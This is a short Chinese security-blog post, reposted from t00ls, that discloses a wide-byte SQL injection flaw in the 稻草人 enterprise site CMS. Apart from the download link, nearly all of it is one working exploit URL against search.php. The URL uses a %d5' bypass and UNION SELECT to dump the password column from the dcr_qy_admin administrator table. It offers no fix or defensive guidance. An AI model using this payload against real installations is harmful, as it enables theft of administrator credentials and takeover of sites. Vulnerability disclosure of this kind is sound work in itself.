关注网络与数据安全

忘记密码
“游侠安全网”创建了网络安全从业者QQ大群(群号:1040978125) ,欢迎各位同仁加入!有其它问题,请联系站长“网路游侠”,QQ:55984512
游侠安全网-网络安全博客
设为首页
加入收藏
订阅本站
热门搜索:黑客 数据安全 网络安全 信息安全 数据库安全 安华金和 安恒信息 游侠安全网 每日安全资讯 数据库审计 360 勒索病毒 北卡科技 等级保护 Linux
游侠安全网-网络安全博客


热点推荐

中国网络安全产品和厂家大全(最新版)
游侠安全网-网络安全博客
您的位置: 首页 > 站长 > 正文

稻草人企业站管理系统宽字节注入

2011-05-16 10:26 推荐: 浏览: 111字号:

摘要:   偶然在站长下载站下了一套企业建站程序  发现人气还蛮高的 下载地址  http://down.chinaz.com/soft/26802.htm 就去测试一下发现了一个宽字节注入漏洞 http://127.0.0.1/search.php?k=...

  偶然在站长下载站下了一套企业建站程序
  发现人气还蛮高的

  下载地址
  http://down.chinaz.com/soft/26802.htm

  就去测试一下发现了一个宽字节注入漏洞

http://127.0.0.1/search.php?k=10%d5'%20union%20select%201,password,3%20from%20dcr_qy_admin%23

  爆密码的效果如下

  转自:t00ls

相关内容:

联系站长租广告位!
标签: ,
本文链接: 稻草人企业站管理系统宽字节注入
版权所有: 非特殊声明均为本站原创文章,转载请注明出处:游侠安全网
订阅更新: 您可以通过RSS订阅我们的内容更新
打印 复制链接

中国首席信息安全官
游侠安全网 www.youxia.org 版权所有
陕ICP备11003551号-2